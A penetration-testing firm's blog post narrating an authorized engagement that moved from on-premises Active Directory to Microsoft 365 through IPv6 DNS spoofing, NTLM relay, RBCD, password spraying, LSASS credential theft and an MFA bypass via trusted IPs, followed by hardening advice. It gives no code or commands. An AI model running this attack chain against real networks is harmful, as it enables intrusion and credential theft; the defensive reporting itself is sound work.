A Sneak Peek Into The Lateral Movement From On-Premises To M365

Welcome to RBT’s second blog, where we have shared one of our recent engagements conducting an Internal Pentest for one of our trusted clients. We have also provided information on how domain admins can improve their Active Directory (AD) and Microsoft 365 environments.

Our client has taken all necessary security measures to safeguard their systems. This includes timely updates of all security patches. Therefore, our assessment focused mainly on identifying misconfigurations through our manual approach. While conducting our investigation, we found that the network used three different protocols: Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Internet Protocol version 6 (IPv6).

The Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. Adversaries may spoof an authoritative source for name resolution to force communication with an adversary-controlled system. This activity may be used to collect or relay authentication materials.

The IPv6 DNS Spoofing – Microsoft Windows Vista and newer versions are configured to enable IPv6 by default, making it the preferred protocol over IPv4. However, this configuration can lead to DNS spoofing attacks, giving malicious actors control over the network.

Our team successfully executed an IPv6 DNS spoofing attack, enabling us to capture several NetNTLMv2 password hashes. Later, we cracked these hashes locally to obtain clear text passwords, revealing potential weak points in the network protocols.

Continuing our journey, we initiated NTLM relay attacks using the IPv6 protocol. Using the relayed hashes, we performed a Resource-Based Constrained Delegation (RBCD) attack, which allowed us to create a new computer account with delegation rights on two domain-joined computers.

Resource-Based Constrained Delegation (RBCD) is a feature available in Windows Server 2012 and later versions. It enables administrators to delegate permissions more securely and control by allowing the delegation configuration to be set on the target resource instead of the source. RBCD provides better resource management by giving administrators greater control over the delegation of permissions.

By requesting a local administrator Ticket Granting Ticket (TGT) using the newly created computer account credentials, we obtained over 10 Windows hashes from two domain-joined computers.

Diving deeper into the post-exploitation phase, we used the previous hashes, which can be used as a stepping stone for lateral movement within the network. We executed a password spray attack and gained administrative access to over 30 computers, revealing that the same password was reused across these computers, underscoring a critical security lapse. This discovery opened up new avenues for our attack, paving the way for the next phase.

When it comes to an attack from a real-world scenario within a network, the main concern is getting valid domain credentials, which becomes a challenge. Once a clear text valid credential was obtained from the users’ description, we used Bloodhound, a security tool to identify highly complex attack paths that would otherwise be impossible to identify quickly. 

Continuing our post-exploitation phase, the most significant breakthrough occurred when we obtained over 15 domain users’ clear-text credentials by abusing a misconfiguration on the Local System Account Manager Shield (LSASS) process, providing unprecedented insights into the network’s environment.

Upon acquiring the clear text passwords, our next step involved user enumeration in Bloodhound, where two users were identified as members of the RDP group on Domain controllers. Leveraging these credentials, we accessed the domain controllers and discovered significant sensitive and critical business-related data.

Further enumeration showcased the client utilized Azure Active Directory (Microsoft Entra) and Microsoft Office 365 suite. Exploiting the “trusted IPs” feature of Microsoft Entra multi-factor authentication, we bypassed MFA prompts by routing our traffic through their network using a SOCKS proxy. This strategic move granted us access to more than 15 users’ Office 365 suite, including Outlook, SharePoint, calendars, etc.

With our client’s permission, we were able to reset the password of one user following the instructions from an unencrypted email, which allowed us to access one of the most critical business web applications.

Finally, we got access to a business-critical web application externally, which was a progress product used to manage internal infrastructure.

We thoroughly examined the internal network during the week-long penetration test engagement. We aimed to identify any vulnerabilities, even minor ones, and improve our client’s security posture. We also analyzed the complexities of network vulnerabilities and gained critical insights highlighting the importance of implementing strong security practices.

  • Enable Multi-Factor Authentication (MFA) on both trusted and untrusted networks in Microsoft Entra.
  • Do not store passwords in clear text in the description field.
  • Encrypt sensitive emails to enhance data security.
  • Disable the unnecessary Link-Local Multicast Name Resolution (LLMNR) and Internet Protocol version 6 (IPv6) protocols via Group Policy Object.
  • Do not reuse passwords across the internal network.
  • Establish strong and secure credential policies within the internal infrastructure.
  • Enable Windows Defender Credential Guard to isolate and protect sensitive credentials, such as password hashes, from theft.

Our penetration test helped our client identify specific vulnerabilities and provided practical recommendations for proactive security measures. These insights can guide our clients to strengthen their security measures and establish a resilient defense against potential threats.

Join us on our next exciting adventure through the digital realm, where we continue contributing to strengthen security measures. Keep an eye out for upcoming blog posts like this one!

Resource-Based Constrained Delegation (RBCD)
Local Security Authority Subsystem Service (LSASS)
Link-Local Multicast Name Resolution (LLMNR)
MFA Setting with Trusted IPs

Authors

  • Asif Khan

    Highly skilled Pentester with experience in various areas, including multi-clouds (AWS, Azure, and GCP), network, web applications, APIs, and mobile penetration testing. In addition, he is passionate about conducting Red and Purple Team assessments and developing innovative solutions to protect company systems and data.

  • Chanel Carr

    Professional security architect of multi-clouds, including Amazon Web Services (AWS), Microsoft Azure, and Google GCP, with experience evaluating and testing computer security systems, creating firewalls, improving network security to protect the system further.

Share the Post:

Subscribe To Our Newsletter